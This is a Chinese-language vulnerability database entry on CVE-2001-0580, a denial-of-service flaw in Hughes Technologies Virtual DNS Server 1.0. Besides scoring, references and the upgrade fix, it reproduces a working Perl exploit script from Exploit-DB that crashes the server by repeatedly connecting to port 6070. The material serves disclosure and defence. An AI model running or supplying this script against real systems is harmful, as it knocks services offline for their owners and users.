CVE-2001-0580
CVSS5.0
发布时间 :2001-08-22 00:00:00
修订时间 :2008-09-10 15:08:27
NMCOES    

[原文]Hughes Technologies Virtual DNS (VDNS) Server 1.0 allows a remote attacker to create a denial of service by connecting to port 6070, sending some data, and closing the connection.


[CNNVD]Hughes Technologies DSL_Vdns访问拒绝漏洞(CNNVD-200108-097)

        Hughes Technologies Virtual DNS (VDNS)服务器1.0版本存在漏洞。远程攻击者可以通过对端口6070的连接导致服务拒绝,发送数据并关闭连接。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0580
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0580
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-097
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2001-05/0050.html
(VENDOR_ADVISORY)  BUGTRAQ  200105007 Advisory for Vdns

- 漏洞信息

Hughes Technologies DSL_Vdns访问拒绝漏洞
中危 其他
2001-08-22 00:00:00 2005-10-20 00:00:00
远程  
        Hughes Technologies Virtual DNS (VDNS)服务器1.0版本存在漏洞。远程攻击者可以通过对端口6070的连接导致服务拒绝,发送数据并关闭连接。

- 公告与补丁

        DSL_Vdns version 2.0 is not affected by this issue:
        Hughes Technologies DSL_Vdns 1.0
        

- 漏洞信息 (20827)

Hughes Technologies DSL_Vdns 1.0 Denial of Service Vulnerability (EDBID:20827)
multiple dos
2001-05-07 Verified
0 neme-dhc
N/A [点击下载]
source: http://www.securityfocus.com/bid/2700/info

It is possible for a remote user to cause a denial of service on a host running DSL_Vdns. Submitting data to port 6070 and closing the connection before the request is fulfilled, will cause DSL_Vdns to enter a 'Default.Closed' state; therefore, refusing any new connections. 

#!/usr/bin/perl
#
# VDNS.PL - Crashes Virtual DNS Server 1.0
# Written by nemesystm of the DHC
# http://dhcorp.cjb.net - neme-dhc@hushmail.com
#
####
use Socket;

die "$0 - Stops Virtual DNS Server 1.0.
written by nemesystm of the DHC
http://dhcorp.cjb.net - neme-dhc\@hushmail.com
usage: perl $0 target.com\n" if !defined $ARGV[0];

for ($count = 0; $count <= 3; $count++) {
        $serverIP = inet_aton($ARGV[0]);
        $serverAddr = sockaddr_in(6070, $serverIP);
        socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
        if (connect (CLIENT, $serverAddr)) {
                send (CLIENT, "A", 0);
                close (CLIENT);
        } else { print ("if the number shown is 2, it worked"); die "Can't connect: $count\n"; }
}		

- 漏洞信息

13890
Hughes Technologies Virtual DNS Malformed Data Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2001-05-07 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Hughes Technologies DSL_Vdns Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 2700
Yes No
2001-05-07 12:00:00 2009-07-11 06:06:00
Discovered and posted to Bugtraq by <neme-dhc@hushmail.com> on May 7, 2001.

- 受影响的程序版本

Hughes Technologies DSL_Vdns 1.0
- Linux libc 6.0
- Linux libc 5x
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
Hughes Technologies DSL_Vdns 2.0
- Linux libc 6.0
- Linux libc 5x
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0

- 不受影响的程序版本

Hughes Technologies DSL_Vdns 2.0
- Linux libc 6.0
- Linux libc 5x
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0

- 漏洞讨论

It is possible for a remote user to cause a denial of service on a host running DSL_Vdns. Submitting data to port 6070 and closing the connection before the request is fulfilled, will cause DSL_Vdns to enter a 'Default.Closed' state; therefore, refusing any new connections.

- 漏洞利用

&lt;neme-dhc@hushmail.com&gt; has provided the following exploit:

- 解决方案

DSL_Vdns version 2.0 is not affected by this issue:


Hughes Technologies DSL_Vdns 1.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站